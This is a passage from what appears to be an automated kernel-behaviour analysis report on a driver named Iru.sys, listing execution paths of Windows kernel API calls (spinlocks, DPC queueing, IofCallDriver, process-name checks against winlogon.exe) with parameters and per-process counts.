| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Kernel Graph 13
Code Block #20 (EP #21, #45)
»
| Information | Value |
|---|---|
| Trigger | _guard_dispatch_icall_nop |
| Start Address | 0xfffff800fc2c7930 |
Execution Path #21 (length: 5, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 5 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdReceiveDatagramEventHandler | ret_val_out = 0x0 |
Execution Path #45 (length: 9, count: 10, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 6 |
| Process 2 (System, PID: 4) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdReceiveDatagramEventHandler | ret_val_out = 0x0 |
Kernel Graph 14
Code Block #21 (EP #26)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b1ff6 |
| Start Address | 0xfffff800f91110d0 |
Execution Path #26 (length: 1, count: 4, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 3 |
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
Kernel Graph 15
Code Block #22 (EP #28)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2ca50a |
| Start Address | 0xfffff800416d95a0 |
Execution Path #28 (length: 1, count: 9, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 9 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
Kernel Graph 16
Code Block #23 (EP #42, #110)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x1d8b |
| Start Address | 0xfffff80041a69880 |
Execution Path #42 (length: 36, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 36 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769904 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769904 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b76bcf0, Irp_unk_out = 0xffffe0003b76bcf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
Execution Path #110 (length: 40, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 40 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002ed2a640 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c84dcf0, Irp_unk_out = 0xffffe0003c84dcf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002ed2a640 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c84dcf0, Irp_unk_out = 0xffffe0003c84dcf0, ret_val_out = 0x103 |
Kernel Graph 17
Code Block #24 (EP #33, #47, #92)
»
| Information | Value |
|---|---|
| Trigger | _guard_dispatch_icall_nop |
| Start Address | 0xfffff800fc2c49f0 |
Execution Path #33 (length: 5, count: 3, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 5 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 2 |
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdBReceiveEventHandler | ret_val_out = 0xc0000016 |
Execution Path #47 (length: 9, count: 10, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 11 (svchost.exe, PID: 324) | 1 |
| Process 2 (System, PID: 4) | 6 |
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7858ac, SpinLock_unk_out = 0xffffe0003a7858ac, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7858ac, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7858ac |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
Execution Path #92 (length: 13, count: 11, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 24 (csrss.exe, PID: 456) | 2 |
| Process 2 (System, PID: 4) | 7 |
| Process 30 (explorer.exe, PID: 1184) | 1 |
| Process 21 (smss.exe, PID: 300) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Kernel Graph 18
Code Block #25 (EP #34)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x14bdf |
| Start Address | 0xfffff800f8856f70 |
Execution Path #34 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
Kernel Graph 19
Code Block #27 (EP #39)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b9c17 |
| Start Address | 0xfffff800416fbdd0 |
Execution Path #39 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsIsThreadTerminating | Thread_unk = 0xffffe0003bc545c0, ret_val_out = 0 |
Kernel Graph 20
Code Block #28 (EP #40)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2ba442 |
| Start Address | 0xfffff8004174d180 |
Execution Path #40 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessWow64Process | ret_val_out = 0x0 |
Kernel Graph 21
Code Block #29 (EP #41, #115)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b3e79 |
| Start Address | 0xfffff800418b4000 |
Execution Path #41 (length: 12, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #115 (length: 1, count: 6, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 2 |
| Process 25 (winlogon.exe, PID: 508) | 1 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
Kernel Graph 22
Code Block #30 (EP #44, #58, #79, #84, #129, #133, #172)
»
| Information | Value |
|---|---|
| Trigger | KiExecuteAllDpcs+0x26c |
| Start Address | 0xfffff800fc2b6e90 |
Execution Path #44 (length: 4, count: 98, processes: 6)
»
| Information | Value |
|---|---|
| Sequence Length | 4 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 7 |
| Process 2 (System, PID: 4) | 19 |
| Process 25 (winlogon.exe, PID: 508) | 68 |
| Process 24 (csrss.exe, PID: 456) | 1 |
| Process 27 (dwm.exe, PID: 784) | 1 |
| Process 42 (iexplore.exe, PID: 556) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #58 (length: 11, count: 63, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 11 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 15 |
| Process 2 (System, PID: 4) | 36 |
| Process 25 (winlogon.exe, PID: 508) | 11 |
| Process 27 (dwm.exe, PID: 784) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x1 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #79 (length: 17, count: 5, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
| Process 42 (iexplore.exe, PID: 556) | 3 |
